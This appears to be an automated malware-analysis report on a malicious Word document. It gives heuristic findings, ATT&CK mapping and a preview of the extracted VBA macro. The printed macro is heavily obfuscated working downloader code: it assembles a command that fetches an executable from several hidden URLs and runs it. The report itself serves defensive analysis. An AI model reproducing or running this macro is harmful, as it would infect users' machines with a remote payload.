MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros that are heavily obfuscated, making it difficult to determine the exact payload. However, the presence of legacy WordBasic auto-exec markers and the structure of the obfuscated script suggest an attempt to execute commands, likely for downloading and running a secondary payload. The large slack space in the OLE structure is also a common indicator of packed or obfuscated content.
Heuristics 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 77,824 bytes but its declared streams total only 36,801 bytes — 41,023 bytes (53%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4142 bytes |
SHA-256: 92cd626f384ff185ccfb002164db003078b479e64e1e53159c0c43b95754b064 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aNHwYTzHKBU"
Function YFZsHuzjH()
On _
Error _
Resume _
Next
Set joIwG = SizaTS
Set XtWRms = rzilu
Set HTbQn = iHAISk
Set oAiVa = LFDBjz
Set UvSJs = iKtAkq
jOtrSdZQrf = Format(Chr(10 + 14 + 1 + 18 + 56)) + "md /V^" + ":" + "^ON/" + Format(Chr(7 + 9 + 0 + 12 + 39)) + Format(Chr(3 + 4 + 0 + 5 + 22)) + "s^" + "e" + "^t Q" + "^j=" + " ^ ^ " + " " + " ^ ^ "
Set witMf = EpIrYE
Set rQcvw = owVqd
Set WhwIt = zAQTB
BZtsZvPD = "^ ^ " + "^ ^ ^ " + " }}^" + "{^h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^t^a" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "}^;ka^e" + "rb" + ";" + "^DvI" + "$"
Set KVdBaw = hTkoJ
Set DArTE = UnfmS
Set wOaLn = NYjwb
Set KJwsGn = QAHQS
ujQGs = "^ ^m" + "etI^-^e" + "^k^o" + "vn^I" + "^;)^" + "DvI^$ " + ",S" + "^U^m" + "^$(^e" + "^liFdao" + "^ln"
Set lpjZo = BhcQkB
Set RbIjuN = bnqof
RQMVq = "woD.m^K" + "d^" + "$^{yrt^" + "{)" + "^" + "GX"
Set aAnuwC = GsmSIb
Set WmPfij = iWASJ
zShaskjt = "v^$ " + "ni " + "^S^U" + "^m$(" + "h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a^er^" + "of^;'ex" + "e^.'^+" + "^t^Un$"
Set JUzpBQ = GtibUP
Set FbHLUC = bTMSS
MnmlwZ = "+^'" + "^\" + "'^" + "+" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "i^lb^" + "u^p^:" + "v" + "n^e^$" + "^" + "=^Dv^I$"
Set toQHdz = mSLZf
Set jzfNNp = EIUivo
Set HLskuv = BqVjts
Set uXkEdJ = OtSHHT
Set uWuiM = ahVwp
NSYlscpHp = "^;" + "'" + "676'^" + " " + "=^ tUn^" + "$^;" + ")'" + "^@'(^ti" + "^l^" + "p^" + "S.'" + "v^zq" + Format(Chr(10 + 14 + 1 + 18 + 56))
Set QzBLq = MwOScI
Set OYzpK = kZRiGl
mWPlCOJ = "^A^B^w" + "hq1/" + "mo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.gni^" + "k^d^ia"
Set WsuqRF = ofHTLl
Set FEZHL = ahRwEP
Set hawjD = Jiwwjq
Set irZwj = zfnRA
jFrZRfiQ = "r//^:p" + "^tt^h^" + "@ziIDLs" + "^MX^" + "o6/^m" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.^de"
Set wskOR = aDtDZ
Set RHHIf = jZNpz
Set AJAioz = wFZiHa
EKhtwhPv = "ti^mi^" + "ls^ko" + "ob" + "^mur" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^eps" + "/" + "/^:p^tt" + "h^@A" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^" + "2fQu^x^" + "OP" + "^3/vvv" + "^"
Set zVYlVw = nmMDU
Set pqhBRH = JVEcC
Set SCHqsB = lwRSYQ
Set ZGTzj = AzVWTA
Set uELuq = LiGZp
jtaQWAtK = "w^w" + "/" + "ku.^" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.b^e" + "^we" + "^ht4/" + "/^:^" + "pt^t^h" + "^@^"
YFZsHuzjH = jOtrSdZQrf + BZtsZvPD + ujQGs + RQMVq + zShaskjt + MnmlwZ + NSYlscpHp + mWPlCOJ + jFrZRfiQ + EKhtwhPv + jtaQWAtK
Set mlPwIQ = NHiZc
Set hrtEs = vUKqk
Set jHLYv = CBHvPd
Set pkiTjf = cfPkUj
Set tLSGK = qlPHb
End Function
Function miqlSuTLK()
On _
Error _
Resume _
Next
Set zVozG = qopFD
Set wilaS = WSmmqd
Set SkROId = qqHEC
Set piibMo = fSGbi
viMir = "xb" + "O^l^X" + "N^qX^" + "2^k/rf." + "t" + "pe" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "no" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "or" + "u^emo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "/"
Set NjzKu = GDilBR
OXTJVwzAIiW = "/:p^" + "tth^" + "@^" + "Hv^9xvu" + "^2y" + "jE/ri^"
Set YfwQAL = dpHCRP
Set XLhni = hkXvkG
Set niwKYC = SlAibz
VUvbCOEkzi = ".tn^ig" + "^a" + "^m" + "//:" + "pt^" + "th^'^" + "=G^Xv$" + "^;tn" + "^e^il" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^b" + "eW^"
Set crYizW = pZcfM
Set OowkOt = rCVsp
Set Skdmd = qkbwDG
rDoJmdoXLXc = ".teN^" + " ^" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "e^jb" + "^o^-w" + "^en^=^" + "m" + "K"
Set LDjWU = LGUiT
KCwCVmH = "d$ " + "^lle" + "h^sr" + "^ew^o^p" + "&&" + "^for" + " /" + "^L %V" + " ^in (3" + "85^,^-" + "1,^0)^" + "do" + " s^e^t "
Set barbs = kfuzRr
Set ItofUc = tUjZU
QESpiYotpA = "5^X=" + "!5^X!!" + "Q^j:~%" + "V," + "1" + "!&&^" + "if"
Set Fvrfab = BNLvXf
VjIcPJw = " %V " + "l^eq ^" + "0 " + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a" + "^l^l %5" + "^X:~^"
Set ciiwa = nhQBhG
uuiAb = "-38^6" + "%" + Format(Chr(3 + 4 + 0 + 5 + 22)) + " " + " " + ""
miqlSuTLK = viMir + OXTJVwzAIiW + VUvbCOEkzi + rDoJmdoXLXc + KCwCVmH + QESpiYotpA + VjIcPJw + uuiAb
Set XCEoC = MzF
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.